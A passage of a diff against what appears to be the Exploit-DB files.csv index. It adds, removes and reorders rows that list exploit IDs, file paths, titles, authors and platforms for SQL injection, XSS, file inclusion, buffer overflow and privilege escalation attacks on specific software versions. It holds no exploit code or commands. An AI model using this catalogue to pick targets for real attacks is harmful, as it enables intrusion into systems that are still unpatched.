Injection Vulnerability",2006-03-30,"Morocco Security Team",php,webapps,0 27536,platforms/asp/webapps/27536.txt,"SiteSearch Indexer 3.5 - Searchresults.ASP Cross-Site Scripting Vulnerability",2006-03-31,r0t,asp,webapps,0 @@ -24583,9 +24645,7 @@ id,file,description,date,author,platform,type,port 27538,platforms/php/webapps/27538.txt,"RedCMS 0.1 profile.php u Parameter SQL Injection",2006-03-31,"Aliaksandr Hartsuyeu",php,webapps,0 27539,platforms/php/webapps/27539.txt,"RedCMS 0.1 login.php Multiple Parameter SQL Injection",2006-03-31,"Aliaksandr Hartsuyeu",php,webapps,0 27540,platforms/php/webapps/27540.txt,"RedCMS 0.1 register.php Multiple Field XSS",2006-03-31,"Aliaksandr Hartsuyeu",php,webapps,0 -27541,platforms/php/webapps/27541.txt,"DbbS 2.0 Topics.PHP SQL Injection Vulnerability",2006-03-31,DaBDouB-MoSiKaR,php,webapps,0 -27542,platforms/php/webapps/27542.txt,"SoftBiz Image Gallery - mage_desc.php Multiple Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 -27543,platforms/php/webapps/27543.txt,"SoftBiz Image Gallery - template.php provided Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 +27727,platforms/windows/dos/27727.txt,"Microsoft Internet Explorer 6.0 Nested OBJECT Tag Memory Corruption Vulnerability",2006-04-22,"Michal Zalewski",windows,dos,0 27544,platforms/php/webapps/27544.txt,"SoftBiz Image Gallery - suggest_image.php cid Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 27545,platforms/php/webapps/27545.txt,"SoftBiz Image Gallery - insert_rating.php img_id Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 27546,platforms/php/webapps/27546.txt,"SoftBiz Image Gallery - images.php cid Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 @@ -24599,7 +24659,6 @@ id,file,description,date,author,platform,type,port 27554,platforms/windows/remote/27554.py,"MinaliC Webserver 2.0.0 - Buffer Overflow (Egghunter)",2013-08-13,PuN1sh3r,windows,remote,8080 27555,platforms/windows/remote/27555.rb,"HP StorageWorks P4000 Virtual SAN Appliance Login Buffer Overflow",2013-08-13,metasploit,windows,remote,13838 27556,platforms/windows/remote/27556.rb,"Open-FTPD 1.2 - Arbitrary File Upload",2013-08-13,metasploit,windows,remote,8080 -27557,platforms/php/webapps/27557.pl,"PHPSelect Submit-A-Link HTML Injection Vulnerability",2006-04-01,s3rv3r_hack3r,php,webapps,0 27558,platforms/jsp/webapps/27558.txt,"Bugzero 4.3.1 query.jsp msg Parameter XSS",2006-04-03,r0t,jsp,webapps,0 27559,platforms/jsp/webapps/27559.txt,"Bugzero 4.3.1 edit.jsp Multiple Parameter XSS",2006-04-03,r0t,jsp,webapps,0 27560,platforms/php/webapps/27560.txt,"aWebNews 1.2 visview.php _GET['cid'] Parameter SQL Injection",2006-04-03,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24645,6 +24704,7 @@ id,file,description,date,author,platform,type,port 27601,platforms/php/webapps/27601.txt,"Spitfire CMS 1.1.4 - CSRF Vulnerability",2013-08-15,"Yashar shahinzadeh",php,webapps,0 27602,platforms/php/webapps/27602.txt,"DotNetNuke DNNArticle Module 10.0 - SQL Injection Vulnerability",2013-08-15,"Sajjad Pourali",php,webapps,0 27603,platforms/php/webapps/27603.txt,"w-CMS 2.0.1 - Remote Code Execution Vulnerability",2013-08-15,ICheer_No0M,php,webapps,0 +27806,platforms/windows/remote/27806.txt,"BankTown ActiveX Control 1.4.2.51817/1.5.2.50209 - Remote Buffer Overflow Vulnerability",2006-05-03,"Gyu Tae",windows,remote,0 27605,platforms/php/webapps/27605.txt,"Alibaba Clone Tritanium Version (news_desc.html) - SQL Injection Vulnerability",2013-08-15,IRAQ_JAGUAR,php,webapps,0 27606,platforms/windows/remote/27606.rb,"Intrasrv 1.0 - Buffer Overflow",2013-08-15,metasploit,windows,remote,80 27607,platforms/windows/remote/27607.rb,"MiniWeb (Build 300) Arbitrary File Upload",2013-08-15,metasploit,windows,remote,8000 @@ -24673,8 +24733,6 @@ id,file,description,date,author,platform,type,port 27630,platforms/linux/remote/27630.txt,"Plone 2.x MembershipTool Access Control Bypass Vulnerability",2006-04-12,MJ0011,linux,remote,0 27631,platforms/cgi/webapps/27631.txt,"Interaktiv.shop 4/5 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-12,r0t,cgi,webapps,0 27632,platforms/php/webapps/27632.txt,"PHPMyAdmin 2.7 SQL.PHP Cross-Site Scripting Vulnerability",2005-10-31,p0w3r,php,webapps,0 -27633,platforms/php/webapps/27633.txt,"MyBB 1.10 Member.PHP Cross-Site Scripting Vulnerability",2006-04-12,o.y.6,php,webapps,0 -27634,platforms/php/webapps/27634.txt,"PatroNet CMS Index.PHP Cross-Site Scripting Vulnerability",2006-04-12,Soothackers,php,webapps,0 27635,platforms/linux/dos/27635.txt,"Mozilla Firefox 1.0.x/1.5 HTML Parsing Null Pointer Dereference Denial of Service Vulnerability",2006-04-13,"Thomas Waldegger",linux,dos,0 27636,platforms/multiple/remote/27636.txt,"Adobe Document Server 6.0 Extensions ads-readerext actionID Parameter XSS",2006-04-13,"Tan Chew Keong",multiple,remote,0 27637,platforms/multiple/remote/27637.txt,"Adobe Document Server 6.0 Extensions AlterCast op Parameter XSS",2006-04-13,"Tan Chew Keong",multiple,remote,0 @@ -24693,6 +24751,9 @@ id,file,description,date,author,platform,type,port 27650,platforms/php/webapps/27650.txt,"FarsiNews 2.1/2.5 - Search.PHP Cross-Site Scripting Vulnerability",2006-04-14,"amin emami",php,webapps,0 27651,platforms/php/webapps/27651.txt,"Tiny Web Gallery 1.4 Index.PHP Cross-Site Scripting Vulnerability",2006-04-15,Qex,php,webapps,0 27652,platforms/php/webapps/27652.txt,"Quack Chat 1.0 - Multiple Vulnerabilities",2013-08-17,"Dylan Irzi",php,webapps,80 +27969,platforms/multiple/dos/27969.c,"Quake 3 Engine CL_ParseDownload Remote Buffer Overflow Vulnerability",2006-06-05,"Luigi Auriemma",multiple,dos,0 +27970,platforms/php/webapps/27970.txt,"CyBoards PHP Lite 1.21/1.25 Common.PHP Remote File Include Vulnerability",2006-06-05,SpC-x,php,webapps,0 +27971,platforms/windows/dos/27971.txt,"Microsoft Internet Explorer 5.0.1 Frameset Memory Corruption Vulnerability",2006-06-05,Kil13r,windows,dos,0 27655,platforms/ios/webapps/27655.txt,"Copy to WebDAV 1.1 iOS - Multiple Vulnerabilities",2013-08-17,Vulnerability-Lab,ios,webapps,0 27656,platforms/ios/webapps/27656.txt,"Photo Transfer Upload 1.0 iOS - Multiple Vulnerabilities",2013-08-17,Vulnerability-Lab,ios,webapps,0 27658,platforms/php/webapps/27658.txt,"PHPGuestbook 0.0.2/1.0 HTML Injection Vulnerability",2006-04-15,Qex,php,webapps,0 @@ -24735,15 +24796,29 @@ id,file,description,date,author,platform,type,port 27695,platforms/cgi/webapps/27695.txt,"Net Clubs Pro 4.0 sendim.cgi Multiple Parameter XSS",2006-04-20,r0t,cgi,webapps,0 27696,platforms/cgi/webapps/27696.txt,"Net Clubs Pro 4.0 imessage.cgi username Parameter XSS",2006-04-20,r0t,cgi,webapps,0 27697,platforms/cgi/webapps/27697.txt,"Net Clubs Pro 4.0 login.cgi password Parameter XSS",2006-04-20,r0t,cgi,webapps,0 +28055,platforms/hardware/webapps/28055.txt,"TP-Link TD-W8951ND - Multiple Vulnerabilities",2013-09-03,xistence,hardware,webapps,0 +28056,platforms/hardware/remote/28056.txt,"Mikrotik RouterOS sshd (ROSSSH) - Remote Preauth Heap Corruption",2013-09-03,kingcope,hardware,remote,0 +28057,platforms/php/webapps/28057.txt,"Cline Communications Multiple SQL Injection Vulnerabilities",2006-06-17,Liz0ziM,php,webapps,0 +28058,platforms/php/webapps/28058.txt,"Eduha Meeting Index.PHP Arbitrary File Upload Vulnerability",2006-06-19,Liz0ziM,php,webapps,0 +28061,platforms/asp/webapps/28061.txt,"Cisco CallManager 3.x/4.x Web Interface ccmadmin/phonelist.asp pattern Parameter XSS",2006-06-19,"Jake Reynolds",asp,webapps,0 +28062,platforms/asp/webapps/28062.txt,"Cisco CallManager 3.x/4.x Web Interface ccmuser/logon.asp XSS",2006-06-19,"Jake Reynolds",asp,webapps,0 +28700,platforms/php/webapps/28700.txt,"CubeCart 3.0.x view_order.php order_id Parameter XSS",2006-09-26,"HACKERS PAL",php,webapps,0 +28053,platforms/hardware/webapps/28053.txt,"Zoom Telephonics ADSL Modem/Router - Multiple Vulnerabilities",2013-09-03,"Kyle Lovett",hardware,webapps,0 +28054,platforms/php/webapps/28054.txt,"Wordpress IndiaNIC Testimonial Plugin - Multiple Vulnerabilities",2013-09-03,RogueCoder,php,webapps,0 27700,platforms/windows/dos/27700.py,"VLC Player 2.0.8 - (.m3u) Local Crash PoC",2013-08-19,Asesino04,windows,dos,0 -27703,platforms/windows/remote/27703.py,"PCMAN FTP 2.07 STOR Command - Buffer Overflow Exploit",2013-08-19,Polunchis,windows,remote,0 -27704,platforms/windows/remote/27704.rb,"Cogent DataHub HTTP Server Buffer Overflow",2013-08-19,metasploit,windows,remote,0 -27705,platforms/multiple/remote/27705.rb,"Java storeImageArray() Invalid Array Indexing Vulnerability",2013-08-19,metasploit,multiple,remote,0 -27706,platforms/hardware/remote/27706.txt,"IBM 1754 GCM 1.18.0.22011 - Remote Command Execution",2013-08-19,"Alejandro Alvarez Bravo",hardware,remote,0 27707,platforms/php/webapps/27707.txt,"I-RATER Platinum Common.PHP Remote File Include Vulnerability",2006-04-20,r0t,php,webapps,0 27708,platforms/php/webapps/27708.txt,"EasyGallery 1.17 EasyGallery.PHP Cross-Site Scripting Vulnerability",2006-04-20,botan,php,webapps,0 27709,platforms/php/webapps/27709.txt,"4homepages 4images 1.7 Member.PHP Cross-Site Scripting Vulnerability",2006-04-20,Qex,php,webapps,0 27710,platforms/php/webapps/27710.txt,"W2B Online Banking SID Parameter Cross-Site Scripting Vulnerability",2006-04-20,r0t,php,webapps,0 +27975,platforms/php/webapps/27975.txt,"Bookmark4U 2.0 inc/common.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 +27976,platforms/php/webapps/27976.txt,"Bookmark4U 2.0 inc/function.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 +27977,platforms/php/webapps/27977.txt,"Kmita FAQ 1.0 - search.php q Parameter XSS",2006-06-05,Luny,php,webapps,0 +27978,platforms/php/webapps/27978.txt,"Kmita FAQ 1.0 index.php catid Parameter SQL Injection",2006-06-05,Luny,php,webapps,0 +27703,platforms/windows/remote/27703.py,"PCMAN FTP 2.07 STOR Command - Buffer Overflow Exploit",2013-08-19,Polunchis,windows,remote,0 +27704,platforms/windows/remote/27704.rb,"Cogent DataHub HTTP Server Buffer Overflow",2013-08-19,metasploit,windows,remote,0 +27705,platforms/multiple/remote/27705.rb,"Java storeImageArray() Invalid Array Indexing Vulnerability",2013-08-19,metasploit,multiple,remote,0 +27706,platforms/hardware/remote/27706.txt,"IBM 1754 GCM 1.18.0.22011 - Remote Command Execution",2013-08-19,"Alejandro Alvarez Bravo",hardware,remote,0 +28694,platforms/php/webapps/28694.txt,"VBulletin 2.3.x Global.PHP SQL Injection Vulnerability",2006-09-26,"HACKERS PAL",php,webapps,0 27711,platforms/php/shellcode/27711.txt,"ThWboard 3.0 Index.PHP Cross-Site Scripting Vulnerability",2006-04-20,"CrAzY CrAcKeR",php,shellcode,0 27712,platforms/cgi/webapps/27712.txt,"Portal Pack 6.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-20,r0t,cgi,webapps,0 27713,platforms/php/webapps/27713.txt,"Manic Web MWGuest 2.1 MWguest.PHP HTML Injection Vulnerability",2006-04-20,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24753,15 +24828,13 @@ id,file,description,date,author,platform,type,port 27717,platforms/php/webapps/27717.txt,"phpldapadmin 0.9.8 compare_form.php dn Parameter XSS",2006-04-21,r0t,php,webapps,0 27718,platforms/php/webapps/27718.txt,"phpldapadmin 0.9.8 copy_form.php dn Parameter XSS",2006-04-21,r0t,php,webapps,0 27719,platforms/php/webapps/27719.txt,"phpldapadmin 0.9.8 rename_form.php dn Parameter XSS",2006-04-21,r0t,php,webapps,0 +33404,platforms/php/webapps/33404.txt,"phpFaber CMS 1.3.36 - 'module.php' Cross-Site Scripting Vulnerability",2009-12-14,bi0,php,webapps,0 27721,platforms/php/webapps/27721.txt,"phpldapadmin 0.9.8 - search.php scope Parameter XSS",2006-04-21,r0t,php,webapps,0 27722,platforms/php/webapps/27722.txt,"phpldapadmin 0.9.8 - template_engine.php Multiple Parameter XSS",2006-04-21,r0t,php,webapps,0 27723,platforms/linux/dos/27723.txt,"Yukihiro Matsumoto Ruby 1.x XMLRPC Server Denial of Service Vulnerability",2006-04-21,"Tanaka Akira",linux,dos,0 27724,platforms/php/webapps/27724.txt,"Scry Gallery Directory Traversal Vulnerability",2006-04-21,"Morocco Security Team",php,webapps,0 27725,platforms/php/webapps/27725.txt,"MKPortal 1.1 - Multiple Input Validation Vulnerabilities",2006-04-22,"Mustafa Can Bjorn IPEKCI",php,webapps,0 27726,platforms/php/webapps/27726.txt,"Simplog 0.9.3 ImageList.PHP Cross-Site Scripting Vulnerability",2006-04-22,nukedx,php,webapps,0 -27727,platforms/windows/dos/27727.txt,"Microsoft Internet Explorer 6.0 Nested OBJECT Tag Memory Corruption Vulnerability",2006-04-22,"Michal Zalewski",windows,dos,0 -27728,platforms/cgi/webapps/27728.txt,"Blender 2.36 BVF File Import Python Code Execution Vulnerability",2006-04-24,"Joxean Koret",cgi,webapps,0 -27729,platforms/php/webapps/27729.txt,"Scry Gallery 1.1 Index.PHP Cross-Site Scripting Vulnerability",2006-04-24,mayank,php,webapps,0 27730,platforms/multiple/dos/27730.py,"Lotus Domino 7.0.x/8.0/8.5 LDAP Message Remote Denial of Service Vulnerability",2006-04-24,"Evgeny Legerov",multiple,dos,0 27731,platforms/php/webapps/27731.txt,"photokorn 1.53/1.54 index.php Multiple Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 27732,platforms/php/webapps/27732.txt,"photokorn 1.53/1.54 postcard.php id Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 @@ -24777,7 +24850,7 @@ id,file,description,date,author,platform,type,port 27742,platforms/php/webapps/27742.txt,"DevBB 1.0 Member.PHP Cross-Site Scripting Vulnerability",2006-04-26,Qex,php,webapps,0 27743,platforms/php/webapps/27743.txt,"MySmartBB 1.1.2/1.1.3 - Multiple Input Validation Vulnerabilities",2006-04-04,BoNy-m,php,webapps,0 27744,platforms/windows/remote/27744.html,"Microsoft Internet Explorer 5.0.1 Modal Dialog Manipulation Vulnerability",2006-04-26,"Matthew Murphy",windows,remote,0 -27745,platforms/windows/dos/27745.txt,"Outlook Express 5.5/6.0,Windows Mail MHTML URI Handler Information Disclosure Vulnerability",2006-04-27,codedreamer,windows,dos,0 +27745,platforms/windows/dos/27745.txt,"Outlook Express 5.5/6.0_Windows Mail MHTML URI Handler Information Disclosure Vulnerability",2006-04-27,codedreamer,windows,dos,0 27746,platforms/windows/remote/27746.txt,"winiso 5.3 - Directory Traversal Vulnerability",2006-04-28,Sowhat,windows,remote,0 27747,platforms/windows/remote/27747.pl,"freeFTPd 1.0.10 (PASS Command) - SEH Buffer Overflow",2013-08-21,Wireghoul,windows,remote,21 27749,platforms/hardware/dos/27749.rb,"Schneider Electric PLC ETY Series Ethernet Controller - Denial of Service",2013-08-21,"Arash Abedian",hardware,dos,0 @@ -24803,6 +24876,9 @@ id,file,description,date,author,platform,type,port 27769,platforms/linux/local/27769.txt,"Linux Kernel 2.6.x CIFS CHRoot Security Restriction Bypass Vulnerability",2006-04-28,"Marcel Holtmann",linux,local,0 27770,platforms/php/webapps/27770.txt,"Blog 0.2.3/0.2.4 Mod Weblog_posting.PHP SQL Injection Vulnerability",2006-04-29,Qex,php,webapps,0 27771,platforms/php/webapps/27771.txt,"Ovidentia 7.9.4 - Multiple Vulnerabilities",2013-08-22,LiquidWorm,php,webapps,80 +27855,platforms/php/webapps/27855.txt,"Vizra A_Login.PHP Cross-Site Scripting Vulnerability",2006-05-11,R00TT3R,php,webapps,0 +27856,platforms/linux/dos/27856.txt,"GNU BinUtils 2.1x Buffer Overflow Vulnerability",2006-05-11,"Jesus Olmos Gonzalez",linux,dos,0 +27857,platforms/php/webapps/27857.txt,"phpBB Chart Mod 1.1 charts.php id Parameter SQL Injection",2006-05-11,sn4k3.23,php,webapps,0 27773,platforms/php/webapps/27773.txt,"CBHotel Hotel Software and Booking system 1.8 - Multiple Vulnerabilities",2013-08-22,"Dylan Irzi",php,webapps,0 27774,platforms/hardware/webapps/27774.py,"Netgear ProSafe - Information Disclosure Vulnerability",2013-08-22,"Juan J. Guelfo",hardware,webapps,0 27775,platforms/hardware/webapps/27775.py,"Netgear ProSafe - Denial of Service Vulnerability",2013-08-22,"Juan J. Guelfo",hardware,webapps,0 @@ -24836,7 +24912,6 @@ id,file,description,date,author,platform,type,port 27803,platforms/php/webapps/27803.txt,"321soft PhP-Gallery 0.9 - index.php path Variable Arbitrary Directory Listing",2006-05-03,d4igoro,php,webapps,0 27804,platforms/php/webapps/27804.txt,"321soft PhP-Gallery 0.9 index.php path Parameter XSS",2006-05-03,d4igoro,php,webapps,0 27805,platforms/windows/remote/27805.py,"dreamMail e-mail client 4.6.9.2 - Stored XSS",2013-08-23,loneferret,windows,remote,0 -27806,platforms/windows/remote/27806.txt,"BankTown ActiveX Control 1.4.2.51817/1.5.2.50209 - Remote Buffer Overflow Vulnerability",2006-05-03,"Gyu Tae",windows,remote,0 27807,platforms/php/webapps/27807.txt,"Fast Click SQL Lite 1.1.2/1.1.3 Show.PHP Remote File Include Vulnerability",2006-05-03,R@1D3N,php,webapps,0 27808,platforms/php/webapps/27808.txt,"Pacheckbook 1.1 Index.PHP Multiple SQL Injection Vulnerabilities",2006-05-03,almaster,php,webapps,0 27809,platforms/php/webapps/27809.txt,"MyNews 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,DreamLord,php,webapps,0 @@ -24877,16 +24952,14 @@ id,file,description,date,author,platform,type,port 27844,platforms/asp/webapps/27844.txt,"EPublisherPro 0.9.7 Moreinfo.ASP Cross-Site Scripting Vulnerability",2006-05-09,Dj_Eyes,asp,webapps,0 27845,platforms/php/webapps/27845.php,"ISPConfig 2.2.2/2.2.3 Session.INC.PHP Remote File Include Vulnerability",2006-05-09,ReZEN,php,webapps,0 27846,platforms/asp/webapps/27846.txt,"EImagePro - - subList.asp CatID Parameter SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0 +33405,platforms/multiple/remote/33405.txt,"APC Network Management Card Cross-Site Request Forgery and Cross-Site Scripting Vulnerabilities",2009-12-15,"Jamal Pecou",multiple,remote,0 27848,platforms/php/webapps/27848.txt,"EImagePro - view.asp Pic Parameter SQL Injection",2006-05-09,Dj_Eyes,php,webapps,0 27849,platforms/asp/webapps/27849.txt,"EDirectoryPro Search_result.ASP SQL Injection Vulnerability",2006-05-09,Dj_Eyes,asp,webapps,0 27850,platforms/windows/dos/27850.txt,"Microsoft Infotech Storage Library Heap Corruption Vulnerability",2006-05-09,"Ruben Santamarta ",windows,dos,0 -27851,platforms/windows/remote/27851.bat,"Microsoft Windows - Path Conversion Weakness",2006-05-10,"Mario Ballano Bárcena",windows,remote,0 +27851,platforms/windows/remote/27851.bat,"Microsoft Windows - Path Conversion Weakness",2006-05-10,"Mario Ballano Bárcena",windows,remote,0 27852,platforms/multiple/remote/27852.pl,"Symantec Enterprise Firewall / Gateway Security HTTP Proxy Internal IP Leakage Weakness",2006-05-10,"Bernhard Mueller",multiple,remote,0 27853,platforms/cfm/webapps/27853.txt,"Cartweaver 2.16.11 Results.cfm category Parameter SQL Injection",2006-04-25,r0t,cfm,webapps,0 27854,platforms/cfm/webapps/27854.txt,"Cartweaver 2.16.11 Details.cfm ProdID Parameter SQL Injection",2006-04-25,r0t,cfm,webapps,0 -27855,platforms/php/webapps/27855.txt,"Vizra A_Login.PHP Cross-Site Scripting Vulnerability",2006-05-11,R00TT3R,php,webapps,0 -27856,platforms/linux/dos/27856.txt,"GNU BinUtils 2.1x Buffer Overflow Vulnerability",2006-05-11,"Jesus Olmos Gonzalez",linux,dos,0 -27857,platforms/php/webapps/27857.txt,"phpBB Chart Mod 1.1 charts.php id Parameter SQL Injection",2006-05-11,sn4k3.23,php,webapps,0 27858,platforms/php/webapps/27858.txt,"phpBB Chart Mod 1.1 charts.php id Parameter XSS",2006-05-11,sn4k3.23,php,webapps,0 27859,platforms/php/webapps/27859.txt,"OZJournals 1.2 Vname Parameter Cross-Site Scripting Vulnerability",2006-05-12,Kiki,php,webapps,0 27860,platforms/php/webapps/27860.txt,"PHP Live Helper 2.0 Chat.PHP Cross-Site Scripting Vulnerability",2006-05-12,Mr-X,php,webapps,0 @@ -24933,7 +25006,7 @@ id,file,description,date,author,platform,type,port 27901,platforms/multiple/dos/27901.java,"Sun Java Runtime Environment 1.3/1.4/1.5 Nested Array Objects Denial of Service Vulnerability",2006-05-22,"Marc Schoenefeld",multiple,dos,0 27902,platforms/linux/remote/27902.txt,"Prodder 0.4 - Arbitrary Shell Command Execution Vulnerability",2006-05-22,"RedTeam Pentesting",linux,remote,0 27903,platforms/linux/dos/27903.txt,"Dia 0.8x/0.9x Filename Remote Format String Vulnerability",2006-05-23,KaDaL-X,linux,dos,0 -27904,platforms/php/webapps/27904.txt,"DoceboLms 2.0.x/3.0.x,DoceboKms 3.0.3,Docebo CMS 3.0.x - Multiple Remote File Include Vulnerabilities",2006-05-23,Kacper,php,webapps,0 +27904,platforms/php/webapps/27904.txt,"DoceboLms 2.0.x/3.0.x_DoceboKms 3.0.3_Docebo CMS 3.0.x - Multiple Remote File Include Vulnerabilities",2006-05-23,Kacper,php,webapps,0 27905,platforms/php/webapps/27905.txt,"DoceboLms 2.0.x Lang Parameter Multiple Remote File Include Vulnerabilities",2006-05-26,beford,php,webapps,0 27906,platforms/windows/dos/27906.txt,"Microsoft Internet Explorer 6.0 Malformed HTML Parsing Denial of Service Vulnerability",2006-05-26,"Thomas Waldegger",windows,dos,0 27907,platforms/php/webapps/27907.txt,"SaPHPLesson 2.0 Show.PHP SQL Injection Vulnerability",2006-05-27,SwEET-DeViL,php,webapps,0 @@ -24964,6 +25037,11 @@ id,file,description,date,author,platform,type,port 27932,platforms/asp/webapps/27932.txt,"Hogstorps Guestbook 2.0 Unauthorized Access Vulnerability",2006-05-01,omnipresent,asp,webapps,0 27933,platforms/php/webapps/27933.txt,"Tekno.Portal Bolum.PHP SQL Injection Vulnerability",2006-06-01,SpC-x,php,webapps,0 27934,platforms/php/webapps/27934.txt,"Abarcar Realty Portal 5.1.5 Content.PHP SQL Injection Vulnerability",2006-06-01,SpC-x,php,webapps,0 +27994,platforms/php/webapps/27994.txt,"Open Business Management 1.0.3 pl1 publication_index.php tf_lang Parameter XSS",2006-06-07,r0t,php,webapps,0 +27995,platforms/php/webapps/27995.txt,"Open Business Management 1.0.3 pl1 group_index.php Multiple Parameter XSS",2006-06-07,r0t,php,webapps,0 +27996,platforms/php/webapps/27996.txt,"Open Business Management 1.0.3 pl1 user_index.php tf_lastname Parameter XSS",2006-06-07,r0t,php,webapps,0 +27997,platforms/php/webapps/27997.txt,"Open Business Management 1.0.3 pl1 list_index.php Multiple Parameter XSS",2006-06-07,r0t,php,webapps,0 +28394,platforms/php/webapps/28394.pl,"FusionPHP Fusion News 3.7 Index.PHP Remote File Include Vulnerability",2006-08-16,O.U.T.L.A.W,php,webapps,0 27938,platforms/linux/local/27938.rb,"VMWare - Setuid vmware-mount Unsafe popen(3)",2013-08-29,metasploit,linux,local,0 27939,platforms/windows/remote/27939.rb,"HP LoadRunner lrFileIOService ActiveX Remote Code Execution",2013-08-29,metasploit,windows,remote,0 27940,platforms/windows/remote/27940.rb,"Firefox XMLSerializer Use After Free",2013-08-29,metasploit,windows,remote,0 @@ -24992,35 +25070,19 @@ id,file,description,date,author,platform,type,port 27963,platforms/php/webapps/27963.txt,"XUEBook 1.0 Index.PHP SQL Injection Vulnerability",2006-06-03,SpC-x,php,webapps,0 27964,platforms/php/webapps/27964.txt,"CoolForum 0.x Editpost.PHP SQL Injection Vulnerability",2006-06-05,DarkFig,php,webapps,0 27965,platforms/osx/local/27965.py,"OSX <= 10.8.4 - Local Root Privilege Escalation (py)",2013-08-30,"David Kennedy (ReL1K)",osx,local,0 -27969,platforms/multiple/dos/27969.c,"Quake 3 Engine CL_ParseDownload Remote Buffer Overflow Vulnerability",2006-06-05,"Luigi Auriemma",multiple,dos,0 -27970,platforms/php/webapps/27970.txt,"CyBoards PHP Lite 1.21/1.25 Common.PHP Remote File Include Vulnerability",2006-06-05,SpC-x,php,webapps,0 -27971,platforms/windows/dos/27971.txt,"Microsoft Internet Explorer 5.0.1 Frameset Memory Corruption Vulnerability",2006-06-05,Kil13r,windows,dos,0 -27972,platforms/php/webapps/27972.txt,"ESTsoft InternetDisk Arbitrary File Upload and Script Execution Vulnerability",2006-06-05,Kil13r,php,webapps,0 -27973,platforms/php/webapps/27973.txt,"Bookmark4U 2.0 inc/dbase.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 -27974,platforms/php/webapps/27974.txt,"Bookmark4U 2.0 inc/config.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 -27975,platforms/php/webapps/27975.txt,"Bookmark4U 2.0 inc/common.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 -27976,platforms/php/webapps/27976.txt,"Bookmark4U 2.0 inc/function.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 -27977,platforms/php/webapps/27977.txt,"Kmita FAQ 1.0 - search.php q Parameter XSS",2006-06-05,Luny,php,webapps,0 -27978,platforms/php/webapps/27978.txt,"Kmita FAQ 1.0 index.php catid Parameter SQL Injection",2006-06-05,Luny,php,webapps,0 +27992,platforms/unix/remote/27992.txt,"FreeType TTF File Remote Buffer Overflow Vulnerability",2006-06-08,"Josh Bressers",unix,remote,0 +27993,platforms/multiple/dos/27993.txt,"FreeType TTF File Remote Denial of Service Vulnerability",2006-06-08,"Josh Bressers",multiple,dos,0 27979,platforms/php/webapps/27979.html,"myNewsletter 1.1.2 UserName SQL Injection Vulnerability",2006-06-05,FarhadKey,php,webapps,0 27980,platforms/php/webapps/27980.txt,"Alex DownloadEngine 1.4.1 Comments.PHP SQL Injection Vulnerability",2006-06-05,ajann,php,webapps,0 27981,platforms/linux/dos/27981.c,"GD Graphics Library 2.0.33 - Remote Denial of Service Vulnerability",2006-06-06,"Xavier Roche",linux,dos,0 27982,platforms/php/webapps/27982.txt,"GANTTy 1.0.3 Index.PHP Cross-Site Scripting Vulnerability",2006-06-06,Luny,php,webapps,0 -27983,platforms/php/webapps/27983.txt,"MyBulletinBoard 1.1.2 Private.PHP Cross-Site Scripting Vulnerability",2006-06-06,o.y.6,php,webapps,0 +27983,platforms/php/webapps/27983.txt,"MyBulletinBoard 1.1.2 - Private.PHP Cross-Site Scripting Vulnerability",2006-06-06,o.y.6,php,webapps,0 27984,platforms/windows/remote/27984.txt,"Microsoft DXImageTransform.Microsoft.Light ActiveX Control Remote Code Execution Vulnerability",2006-06-13,"Will Dormann",windows,remote,0 27985,platforms/php/webapps/27985.txt,"AZ Photo Album Script Pro Cross-Site Scripting Vulnerability",2006-05-23,Luny,php,webapps,0 27986,platforms/windows/remote/27986.html,"Internet Explorer 5.5/6.0/7.0 JavaScript Key Filtering Vulnerability",2006-06-06,"Jesse Ruderman",windows,remote,0 27987,platforms/linux/remote/27987.html,"Firefox 1.x JavaScript Key Filtering Vulnerability",2006-06-06,"Jesse Ruderman",linux,remote,0 27988,platforms/php/webapps/27988.py,"MiraksGalerie 2.62 galimage.lib.php listconfigfile[0] Parameter Remote File Inclusion",2006-06-07,"Federico Fazzi",php,webapps,0 27989,platforms/php/webapps/27989.txt,"MiraksGalerie 2.62 galsecurity.lib.php listconfigfile[0] Parameter Remote File Inclusion",2006-06-07,"Federico Fazzi",php,webapps,0 -27990,platforms/php/webapps/27990.txt,"Calendar Express 2.2 Month.PHP SQL Injection Vulnerability",2006-06-07,"CrAzY CrAcKeR",php,webapps,0 -27991,platforms/php/webapps/27991.txt,"PostNuke 0.76 RC2 - Multiple Input Validation Vulnerabilities",2006-06-07,SpC-x,php,webapps,0 -27992,platforms/unix/remote/27992.txt,"FreeType TTF File Remote Buffer Overflow Vulnerability",2006-06-08,"Josh Bressers",unix,remote,0 -27993,platforms/multiple/dos/27993.txt,"FreeType TTF File Remote Denial of Service Vulnerability",2006-06-08,"Josh Bressers",multiple,dos,0 -27994,platforms/php/webapps/27994.txt,"Open Business Management 1.0.3 pl1 publication_index.php tf_lang Parameter XSS",2006-06-07,r0t,php,webapps,0 -27995,platforms/php/webapps/27995.txt,"Open Business Management 1.0.3 pl1 group_index.php Multiple Parameter XSS",2006-06-07,r0t,php,webapps,0 -27996,platforms/php/webapps/27996.txt,"Open Business Management 1.0.3 pl1 user_index.php tf_lastname Parameter XSS",2006-06-07,r0t,php,webapps,0 -27997,platforms/php/webapps/27997.txt,"Open Business Management 1.0.3 pl1 list_index.php Multiple Parameter XSS",2006-06-07,r0t,php,webapps,0 27998,platforms/php/webapps/27998.txt,"Open Business Management 1.0.3 pl1 company_index.php Multiple Parameter XSS",2006-06-07,r0t,php,webapps,0 